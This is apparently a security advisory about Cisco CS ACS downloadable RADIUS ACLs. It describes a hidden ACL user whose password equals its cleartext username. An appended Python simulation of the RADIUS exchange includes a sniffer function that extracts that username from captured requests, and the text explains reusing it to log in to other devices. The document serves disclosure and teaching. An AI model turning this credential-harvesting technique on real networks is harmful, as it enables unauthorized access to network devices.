Cisco PIX / CS ACS: Downloadable RADIUS ACLs vulnerability

Hi!

The following is a description of a vulnerability in the Cisco
implementation of downloadable ACLs, which are used by the Cisco PIX
firewall authentication proxy (aka cut-through proxy) and by VPN 3000
concentrators.

When an administrator creates an ACL on the Cisco Secure Access Control
Server (CS ACS RADIUS server), it is assigned the internal name
#ACSACL#-IP-uacl-<random>, for example #ACSACL#-IP-uacl-43a97a9d. The
<random> part is changed by CS ACS every time the administrator modifies
the ACL. At the same time CS ACS creates an internal hidden user with
the name #ACSACL#-IP-uacl-43a97a9d and the password
#ACSACL#-IP-uacl-43a97a9d (!). This user is not visible in the CS ACS
GUI.

The protocol used by the PIX to download the ACL works as follows:

0) The user goes to the Internet (for example) through the PIX via
HTTP(S). The PIX asks for a username and a password, and the user
enters them in the dialog window.
1) The PIX sends a RADIUS Access-Request to CS ACS to authenticate the
user (the user's password is encrypted by RADIUS; the username is not).
2) CS ACS authenticates the user and sends back the cisco-av-pair
vendor-specific attribute (VSA) with the value
ACS:CiscoSecure-Defined-ACL=#ACSACL#-IP-uacl-43a97a9d.
3) The PIX sends a second RADIUS Access-Request, this time to
authenticate the user #ACSACL#-IP-uacl-43a97a9d (with that same string
as the password).
4) CS ACS authenticates that user and sends back the ACL body as
further cisco-av-pair VSAs (ip:inacl#1= ...).

Vulnerability:

This means that anybody with a sniffer can see the username
#ACSACL#-IP-uacl-43a97a9d, which the RADIUS protocol sends in clear over
the network from the CS ACS server to the PIX (and back again in the
second Access-Request). The password of this user is the same as the
username. If any network device is configured to use the very same CS
ACS server for login authentication, the sniffed username can be used
(as both username and password) to log in to that device.

Setting the RADIUS IETF attribute Service-Type to "Outbound" to prevent
this username from being used for logins may not help:

1) it is impossible to set this attribute for the user
#ACSACL#-IP-uacl-43a97a9d, because the user is not visible in the CS ACS
web interface;
2) it is not always possible to set it for the "default" group (the
user #ACSACL#-IP-uacl-43a97a9d always belongs to the "default" CS ACS
group), because this group may be used for something else;
3) some network devices (most notably the PIX firewall) ignore the
Service-Type attribute (PIX firewall 6.x code does not support login
authorization at all (!)), and Cisco routers ignore this attribute when
only authentication, not authorization, is configured.

Generally speaking, the RADIUS protocol is not appropriate for things
like downloading ACLs or other attributes on behalf of a user on an
"as-needed" basis, because it does not separate authentication from
authorization. Usually this leads to the creation of a fake user with
the password "cisco" or "<username>". Unfortunately this practice is
common on Cisco devices.

Thx,
Oleg Tipisov,
Moscow
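The two-round exchange described in the post, plus the sniffer's view of it, as an added example in Python (not code from the original post, from Cisco, or from CS ACS). It builds the RADIUS Access-Request and Access-Accept packets per RFC 2865, carries the ACL name in a Cisco VSA (vendor 9, cisco-av-pair) as the post describes, and then pulls the User-Name out of the Access-Requests the way an on-path sniffer would. The shared secret, the user "alice", the host address and the ACL body are constructed for the demonstration; the ACL name is the one quoted in the post.

```python
"""Constructed model of the two-round PIX <-> CS ACS exchange from the post.
Added example; not code from the post, from Cisco or from CS ACS. Secret, user,
address and ACL body are made up; RADIUS framing follows RFC 2865."""
import hashlib
import os
import re
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
USER_NAME, USER_PASSWORD, VENDOR_SPECIFIC = 1, 2, 26
CISCO_VENDOR_ID, CISCO_AV_PAIR = 9, 1               # VSA vendor 9, sub-attribute 1

SECRET = b"pix-acs-shared-secret"                    # constructed shared secret
ACL_NAME = "#ACSACL#-IP-uacl-43a97a9d"               # name form quoted in the post
ACL_USER = re.compile(r"^#ACSACL#-IP-\w+-[0-9a-f]+$")


def hide_password(secret, authenticator, password):
    """RFC 2865 5.2: each 16-byte block XORed with MD5(secret || previous block),
    the first block with the Request Authenticator. Only User-Password gets
    this treatment; User-Name travels in clear."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(a ^ b for a, b in zip(padded[i:i + 16], key))
        out, prev = out + block, block
    return out


def reveal_password(secret, authenticator, hidden):
    """Inverse of hide_password; needs the shared secret."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        key = hashlib.md5(secret + prev).digest()
        out += bytes(a ^ b for a, b in zip(hidden[i:i + 16], key))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def attr(kind, value):
    return struct.pack("!BB", kind, 2 + len(value)) + value


def cisco_av_pair(text):
    value = text.encode()
    return attr(VENDOR_SPECIFIC, struct.pack("!IBB", CISCO_VENDOR_ID, CISCO_AV_PAIR, 2 + len(value)) + value)


def access_request(ident, secret, username, password):
    ra = os.urandom(16)                               # Request Authenticator
    attrs = attr(USER_NAME, username.encode()) + attr(USER_PASSWORD, hide_password(secret, ra, password.encode()))
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + ra + attrs


def access_accept(request, secret, av_pairs):
    attrs = b"".join(cisco_av_pair(p) for p in av_pairs)
    header = struct.pack("!BBH", ACCESS_ACCEPT, request[1], 20 + len(attrs))
    resp_auth = hashlib.md5(header + request[4:20] + attrs + secret).digest()   # Response Authenticator
    return header + resp_auth + attrs


def parse(pkt):
    """Returns (code, authenticator, [(name, value), ...]) with Cisco VSAs unpacked."""
    code, _, length = struct.unpack("!BBH", pkt[:4])
    attrs, i = [], 20
    while i < length:
        kind, alen = pkt[i], pkt[i + 1]
        val = pkt[i + 2:i + alen]
        if kind == VENDOR_SPECIFIC and val[:4] == struct.pack("!I", CISCO_VENDOR_ID) and val[4] == CISCO_AV_PAIR:
            attrs.append(("cisco-av-pair", val[6:4 + val[5]].decode()))
        elif kind == USER_NAME:
            attrs.append(("User-Name", val.decode()))
        elif kind == USER_PASSWORD:
            attrs.append(("User-Password", val))      # still hidden at this point
        i += alen
    return code, pkt[4:20], attrs


def simulate_exchange():
    """Steps 1-4 from the post: real user in, ACL name out, PIX 'logs in' as the ACL name."""
    req1 = access_request(1, SECRET, "alice", "alice-real-password")
    acc1 = access_accept(req1, SECRET, ["ACS:CiscoSecure-Defined-ACL=" + ACL_NAME])
    acl_user = dict(parse(acc1)[2])["cisco-av-pair"].split("=", 1)[1]
    req2 = access_request(2, SECRET, acl_user, acl_user)     # password == username, as in the post
    acc2 = access_accept(req2, SECRET, ["ip:inacl#1=permit tcp any host 192.0.2.10 eq 80",
                                        "ip:inacl#2=deny ip any any"])
    return [req1, acc1, req2, acc2]


def sniff_acl_usernames(packets):
    """Sniffer view: no shared secret needed, User-Name is in clear in every Access-Request."""
    found = []
    for p in packets:
        code, _, attrs = parse(p)
        found += [v for k, v in attrs if code == ACCESS_REQUEST and k == "User-Name" and ACL_USER.match(v)]
    return found


def hidden_password_is_username(request, secret):
    """Confirms the post's claim with the secret in hand (a sniffer does not need this step)."""
    _, ra, attrs = parse(request)
    fields = dict(attrs)
    return reveal_password(secret, ra, fields["User-Password"]).decode() == fields["User-Name"]
```

`sniff_acl_usernames()` recovers the ACL user from the captured packets without touching the shared secret; `hidden_password_is_username()` uses the secret only to confirm what the post states, that the hidden user's password is its own name, which is why the sniffer never has to decrypt anything before trying the name as both username and password on another device that authenticates against the same ACS.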
